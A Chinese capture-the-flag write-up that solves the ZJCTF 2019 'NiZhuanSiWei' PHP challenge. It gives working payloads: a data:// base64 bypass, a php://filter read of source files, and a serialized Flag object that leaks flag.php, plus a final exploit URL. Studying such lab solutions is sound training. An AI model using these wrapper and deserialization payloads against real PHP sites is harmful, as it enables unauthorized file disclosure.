第二十四题——[ZJCTF 2019]NiZhuanSiWei

题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,展示了php代码

在这里插入图片描述

第二步:使用data协议绕过text参数检测

  1. 经过代码分析,text参数不能为空,且根据text参数所指定的文件名字读取出来与字符串welcome to the zjctf进行比较。
  2. 使用data协议进行绕过文件读取,将welcome to the zjctf进行64编码后得到:d2VsY29tZSB0byB0aGUgempjdGY=,传入参数text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
    在这里插入图片描述

第三步:使用filter查看useless.php

  1. 审计代码看出file参数需要传入useless.php,用于加载useless.php之后对password进行反序列化,再打印password
  2. 使用filter查看useless.php,构造参数file=php://filter:read=convert.base64-encode/resource=useless.php,得到一串base64编码,解码的到
<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  

第四步:构造password参数获取flag

  1. 通过审计uselsee.php得知,password需要传入Flag对象,且对象中file的值为flag.php。
  2. 在第一步中得知password经过了反序列化,所以要传入序列化的Flag对象。
  3. 构造php文件获取序列化对象,结果为:O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
<?php  
class Flag{  //flag.php  
    public $file='flag.php';  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
$a = serialize(new Flag("flag.php"));
echo $a
?> 
  1. 最终参数为:?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
    在这里插入图片描述
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值